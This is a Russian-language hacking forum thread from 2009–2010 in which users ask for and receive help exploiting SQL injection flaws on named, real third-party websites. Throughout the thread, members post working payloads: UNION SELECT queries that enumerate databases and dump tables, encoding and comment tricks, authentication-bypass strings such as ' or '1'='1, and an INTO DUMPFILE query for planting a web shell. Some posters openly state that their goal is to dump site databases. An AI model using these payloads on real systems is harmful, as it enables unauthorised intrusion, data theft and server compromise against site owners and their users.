RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-10-31 16:29:16.500000
|
|
|
ibz07
Сообщений: 74
Оценки: 0
Присоединился: 2009-09-28 21:31:31.813333
|
quote:
ORIGINAL: Lorden программа encoder1.0 юзай её и небудит утебя никаких проблем с переводом У меня линукс, мене нужен онлайн сервис, если буду хакать на другой машине, то сборник программ я не буду таскать засобой.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-10-31 21:47:23.170000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
quote:
ORIGINAL: ibz07 Почиму не работает так? http://localhost/index.php?id=-1+UNION+SELECT+1,table_name+FROM+information_schema.tables+WHERE+table_schema="0x"+hex("site") Каким способом можно отказаться от 16 системы, просто я не хочу мучатся переводить в 16 систему? Я же тебе сказал, что в твоем случае сравнение ведется со строкой "0x73697465". table_schema="0x73697465" Понимаешь? Это строка. Первый ее символ "0", второй "x",… А когда ты пишешь table_schema=0x73697465 0x73697465 переводится из 16-ричной системы в строку и происходит сравнение table_schema="site" Если не экранируются кавычки, то и переводить в 16-ричную систему нет смысла, так и пиши: table_schema="site"
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-10-31 22:09:35.876666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: ibz07 quote:
ORIGINAL: Lorden программа encoder1.0 юзай её и небудит утебя никаких проблем с переводом У меня линукс, мене нужен онлайн сервис, если буду хакать на другой машине, то сборник программ я не буду таскать засобой. http://bug-track.ru/coder/
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-01 13:41:14.206666
|
|
|
Lorden
Сообщений: 68
Оценки: 0
Присоединился: 2008-11-10 19:06:31.566666
|
подскажити что такое: при таком запросе http://www.trizland.ru/author.php?id=-140+union+select+1,2,3,4,5 показывает что уязвимость есть а при таком запросе: http://www.trizland.ru/author.php?id=-140+union+select+1,2,3,users(),5 выдаёт ошибку, подскажити как обойти её?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-01 14:47:43.040000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
http://www.trizland.ru/author.php?id=-140+union+select+1,2,3,unhex(hex(user())),5
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-05 11:41:54.173333
|
|
|
Eridan
Сообщений: 5
Оценки: 0
Присоединился: 2009-08-05 23:02:24.290000
|
http://bids.md/index.php?lot=26 тут по ходу есть инъекция,но ошибку выдают с какими-то закорючками,можно ли это перекодировать в нормальный вид и раскрутить дальше?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-05 12:22:39.543333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Не закорючки там, кодировку в браузере настрой: quote:
Была попытка SQL-инъекции в GET-запросе lot = 26'
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-06 16:21:06.496666
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
привет всем! помоги те пожайлуста SELECT * FROM dat_news WHERE newsid=' !тут дыра! ' скобки не фильтруються! не могу закомментировать последний апостроф пробывал /*, – что делать?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-06 21:34:34.973333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
1. Попробуй писать коментарии с пробелом на конце /*+, –+ 2. Если не прокатит, то вообще незачем коментировать. Пиши так: newsid=-1'+UNION+SELECT+(что и откуда тебе надо)+WHERE+'1'='1 Правда при этом возникнет косяк с лимитом и выбирать данные придется как в MSSQL.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-07 02:45:11.090000
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
SELECT * FROM dat_news WHERE newsid='-1' UNION SELECT 1,2 where 1='1' - что то колонки подобрать немогу можно какнибуть по другому?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-07 10:57:09.060000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
GoldCode ну для начала подредактируй свой пост, и одной строчки достаточно. Далше, в каком виде тебе приходит ошибка? Если в виде MySQL сообщения, то что пишет? И еще. Какой запрос вызвал у тебя такое where 1='1' - P.S. В качестве коментария можешь попробовать еще %23 и %60.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-08 03:28:36.226666
|
|
|
MrСIM
Сообщений: 44
Оценки: 0
Присоединился: 2009-11-06 10:44:04.223333
|
Я знаю, что тема вдоль и поперек изъезжена(особенно глупыми вопросами типа а что дальше делать), но я решился на этот пост… Мне 17 и програмлю я с 5 класса, неплохо разбираюсь во многих языках и все такое(пойму что тут делается даже не зная языка проблема только в синтаксисе…). Я прекрасно понимаю весь процесс sql-инъекций, поэтому задаю только 2 вопроса: 1.Для начала я думаю стоит посерьезнее заняться языками программирования PHP и My_SQL(синтаксисом, командами…), есть ли какие либо предпочтения по литературе или достаточно будет первого попавшегося под руку? 2.Есть ли у кого статьи, в которых (как в октябрьском номере хакера) описаны хитрости с командами My_SQL(замена пробелов и т.п.)? Посколько после первых моих экспериментов с сайтом на DLE меня порадовала натпись : "Хакинг эттепт!" . Я думаю на этом все, в гугль не отправлять я и сам могу, я ищю совета а не результат поисковой машины…
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-08 17:55:38.873333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
MrСIM зайди в этом разделе в Уроки группы 9009 Там есть два урока по скулям. В них я и книжку рекомендовал и некоторые тонкости уже успел описать. GoldCode блин, что-то я сразу тупанул. Ведь запрос …UNION SELECT 1,2 where 1='1' просто обязан выдать ошибку. Если не прокатили никакие комментарии составь запрос: SELECT * FROM dat_news WHERE newsid='-1' UNION SELECT 1,2 FROM information_schema.columns where 1='1'
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-09 18:44:56.810000
|
|
|
GoldCode
Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
|
Что то я устал мурыжить этот забугорный сайт, хочешь сам попытайся http://www.socialfriendsonline.com/dat_news.php?nid=5'+where+1='1 можешь ещё и этот помурыжить сайт http://www.youand.me/news.php?cat=%'+and+category='-1+UNION+SELECT+1,2,3,4,5+where+category='
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-20 14:09:47.323333
|
|
|
lomak122
Сообщений: 205
Оценки: 0
Присоединился: 2009-11-17 17:27:57.543333
|
http://inferno.su/news.php?p_id=0 Что тут может бытЬ ??
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-23 23:56:32.676666
|
|
|
micropsia
Сообщений: 7
Оценки: 0
Присоединился: 2009-11-19 17:18:14.060000
|
А вот с этим что-нибудь можно сделать? давно интересует меня http://www.putin.ru/advanced-search/%2527%2527%2527.html?ordering=newest&searchphrase=all#content
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-11-29 11:41:15.260000
|
|
|
lomak122
Сообщений: 205
Оценки: 0
Присоединился: 2009-11-17 17:27:57.543333
|
http://inferno.su/news.php?p_id=0 вообще непредставляю что тут делать ;(( попробуйте на досуге..
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-01 18:38:52.793333
|
|
|
newmem
Сообщений: 8
Оценки: 0
Присоединился: 2009-12-01 11:56:34.243333
|
нашел сайт сделал так http://www.***.ru/index.php?id=-1 вылезла такая ошибка Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/htdocs/includer.php on line 62 Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/htdocs/includer.php on line 69 Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 14 in /home/www/htdocs/includer.php on line 92 вроде подобрал кол-во столбцов и страница стала пустая подскажите пожалуйста почему так. http://www.***.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-01 19:24:45.333333
|
|
|
newmem
Сообщений: 8
Оценки: 0
Присоединился: 2009-12-01 11:56:34.243333
|
quote:
ORIGINAL: Lorden программа encoder1.0 юзай её и небудит утебя никаких проблем с переводом а где можно взять эту прогу скинь плиз куда нить ее чтоб можно было качнуть
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-01 21:31:13.490000
|
|
|
lomak122
Сообщений: 205
Оценки: 0
Присоединился: 2009-11-17 17:27:57.543333
|
http://inferno.su/news.php?p_id=0 ___ посмотрите на досуге.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-13 00:49:02.703333
|
|
|
s0llo
Сообщений: 7
Оценки: 0
Присоединился: 2009-12-13 00:00:19.873333
|
есть сайт на котором присутствует иньекция, на этом сайте много баз данных.версия sql 5(поддерживает information_schema) вопрос: как мне спомощью information_schema вывести инфу из других баз? (например я нахожусь в базе "test" а нужны данные из базы "users") ??????????
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-13 01:19:44.656666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Узнаем все БД: http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(schema_name),3,4,5,6,7,8,9,10+from+information_schema.schemata– Узнаем таблицы из нужной БД: http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema='ИМЯ_БД'– Узнаем колонки из нужной таблицы из нужной БД: http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name='ИМЯ_ТАБЛИЦЫ'+and+table_schema='ИМЯ_БД'– Узнаем данные из нужной таблицы из нужной БД: http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(ИМЯ_КОЛОНКИ),3,4,5,6,7,8,9,10+from+ИМЯ_БД.ИМЯ_ТАБЛИЦЫ– PS: или убрать group_concat и юзать как обычно: limit+0,1 limit+1,1 ……
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-13 02:46:49.153333
|
|
|
s0llo
Сообщений: 7
Оценки: 0
Присоединился: 2009-12-13 00:00:19.873333
|
quote:
ORIGINAL: Pashkela Узнаем все БД: http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(schema_name),3,4,5,6,7,8,9,10+from+information_schema.schemata– Узнаем таблицы из нужной БД: http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema='ИМЯ_БД'– Узнаем колонки из нужной таблицы из нужной БД: http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name='ИМЯ_ТАБЛИЦЫ'+and+table_schema='ИМЯ_БД'– Узнаем данные из нужной таблицы из нужной БД: http://site.com/index.php?page=8&id=-11+union+select+1,group_concat(ИМЯ_КОЛОНКИ),3,4,5,6,7,8,9,10+from+ИМЯ_БД.ИМЯ_ТАБЛИЦЫ– PS: или убрать group_concat и юзать как обычно: limit+0,1 limit+1,1 …… ага… спс!!! но теперь при выводе других баз, страничка не выводит данные(ошибки на стр. нет) баз данных примерно 20, не думаю что они пустые!!!!! подскажите!
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-13 03:16:45.886666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
может просто не хватать прав на чтение, могут быть пустые. Не всегда есть права читать данные не из текущей БД
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-13 18:57:52.033333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
s0llo, возможно ты просто неправильно запрос составил. Если бы не было прав на базу, она бы не отражалась в information_schema. А ошибки выводятся на экран?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-22 23:07:15.570000
|
|
|
Dikoy
Сообщений: 68
Оценки: 0
Присоединился: 2009-03-03 08:48:14.176666
|
помогите… вот нашёл иньекцию http://www.rf-cheats.ru/forum/search.php?do=process' хотел бы хоть что то с ней сделать?( а вообще слить бд)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-24 00:52:06.603333
|
|
|
Agent Smith
Сообщений: 976
Оценки: 0
Присоединился: 2007-04-10 21:56:49.593333
|
[video]Stcy0rhDkEo[/video] снял небольшое видео. Правда там больше времени у меня пошло, что бы найти форму ввода хоть какую-то. Но все SQL инъекция прошла. Пользуйтесь. По ходу ещё дыру не закрыли, поскольку это видео на ютубе видели 6 человек.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-26 01:27:10.560000
|
|
|
Fixxer
Сообщений: 40
Оценки: 0
Присоединился: 2009-12-05 00:54:21.626666
|
Всем привет. Можно ли как-нибудь в этой ситуации найти SQL-inj? http://wowedge.info/armory/index.php?searchType=profile&charPage=account&character=Fixx&realm=The%20Edge# Или через личный кабинет… Логин Fixxer Пароль 12213 Помогите пож) Очень интересно тем, что админ там хороший) руки ростут где надо) так что это не просто)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-31 10:18:52.483333
|
|
|
DokKok
Сообщений: 1
Оценки: 0
Присоединился: 2009-12-31 08:55:41.573333
|
Здравствуйте. Столкнулся со следующей проблемой: Нашел дырявый сайт, начала пробовать SQL-inj. /index.php?id=-1 union select 1,2,3/* - канает (показывает 1 и 3) /index.php?id=-1 union select 1,2,3,4/* - уже ошибка Определил версию Mysql (5), Определил имя таблицы - Clients. Начал перебирать поля. Оказалось в таблице 10 полей (ID,first_name,last_name, phone, email, LOGIN, PASSWORD, lastip, lastdate,firstdate). Если пытюсь вывести значения поля ID - выводит нормально, в остальных всех случаях ошибка- Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/home/adminmss/public_html/vvlaw/index.php on line 34 А делаю простейший запрос: например /index.php?id=-1 union select login,2,3 from clients/* (тут выскакивает ошибка, написанная выше) Не пойму в чем дело - помогите пожалуйста.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-31 12:52:32.510000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
1. Таблица может быть в другой БД, проверить так: /index.php?id=-1 union select table_schema,2,3 information_schema.columns where table_name='ИМЯ_ТАБЛИЦЫ' 2. Записей может быть 0, проверь так: /index.php?id=-1 union select count(*),2,3 from clients/* и посмотри ответ в принтабельном поле, если ноль - о чем речь 3. Несовпадение кодировок /index.php?id=-1 union select unhex(hex(login)),2,3 from clients/* и еще куча вариантов. Читай тему, тут всё есть (включая ссылки, что почитать). СНГ
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-31 13:08:35.610000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Pashkela, видимо №3. По поводу №1: он пишет, что поле ID может вывести, значит в таблицу попал. По поводу №2: если бы таблица была пуста, то, вроде, ошибки бы не было, просто пустой результат. С Новым Годом!:)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-12-31 16:26:29.090000
|
|
|
daniel_1024
Сообщений: 294
Оценки: 0
Присоединился: 2009-07-14 14:37:28.690000
|
скажите есть ли возможность залить шелл на сайт через sql - инъекцию есть знаешь директорию доступную для записи (к примеру /path/), есть права на запись (file_priv:Y) ? какой нужно в этом случае составить запрос ?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-01-02 15:36:51.173333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: daniel_1024 скажите есть ли возможность залить шелл на сайт через sql - инъекцию есть знаешь директорию доступную для записи (к примеру /path/), есть права на запись (file_priv:Y) ? какой нужно в этом случае составить запрос ? union+select+1,2,3,тут_код_шелла_в_hex,4,5,6,7+into+dumpfile+'/абсолютный_путь_до_папки_с_правами_на_запись/имя_шелла.php'
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-01-03 16:34:14.863333
|
|
|
Fixxer
Сообщений: 40
Оценки: 0
Присоединился: 2009-12-05 00:54:21.626666
|
Всех с праздниками!! Ребят я нуб…подскажите пож. Что это ' or '1'='1 или ' or "=' or '1'='1 Как это называется? Можно ли изменить 1 на любое другое число? Что это запрос делает? Я в яндексе искал..там не нашел. Помогите пож.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-01-03 18:16:27.453333
|
|
|
PR23
Сообщений: 45
Оценки: 0
Присоединился: 2007-11-11 22:23:58.480000
|
Приветствую. Такой вопрос: в поле логина админки ввожу одинарную кавычку. Вылазит ошибка quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and admin_password=old_password('') limit 1' at line 1 Стоит дальше капать? Что попробывать ввести?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-01-03 19:25:35.690000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
quote:
ORIGINAL: Fixxer Что это ' or '1'='1 или ' or "=' or '1'='1 В основном, такие конструкции применяются для простукивания скрипта на наличие дыр. Разберись с принципом проведения инъекций и ты сам поймешь что к чему. quote:
ORIGINAL: PR23 Стоит дальше капать? Что попробывать ввести? Еще как стоит. Например так: admin'/* 666' or 1=1/* Если не прокатит, поизменяй комментарии.
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-01-03 21:08:47.690000
|
|
|
PR23
Сообщений: 45
Оценки: 0
Присоединился: 2007-11-11 22:23:58.480000
|
quote:
Еще как стоит. Например так: admin'/* 666' or 1=1/* Спасибо за совет, НО Попробывал: admin'/* 666' or 1=1/* Ничего(т.е. перенаправило на форму ввода логина и пасса) Попробывал: admin' – 666' or 1=1 – quote:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '666' or 1=1 –') limit 1' at line 1 Что это значит?
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-01-03 21:35:25.973333
|
|
|
Fixxer
Сообщений: 40
Оценки: 0
Присоединился: 2009-12-05 00:54:21.626666
|
Я нашёл сайт где в админке пишешь Логин: 1 Пасс: ' or '1'='1 И заходит под админом. но так как проблема с прокси я ничего там не делал) Нашёл сегодня сайт) Хориз, если ты хорошо разбираешься…может поучишь меня??? В аське…
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-01-03 22:04:00.266666
|
|
|
Fixxer
Сообщений: 40
Оценки: 0
Присоединился: 2009-12-05 00:54:21.626666
|
Естественно в личке номер… =)
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2010-01-03 22:19:51.840000
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
PR23, ты не понял, admin'/* и 666' or 1=1/* это два разных варианта, вводимых в поле логин. Пасс можешь ввести любой. Например blablabla.
|
|
|
|
|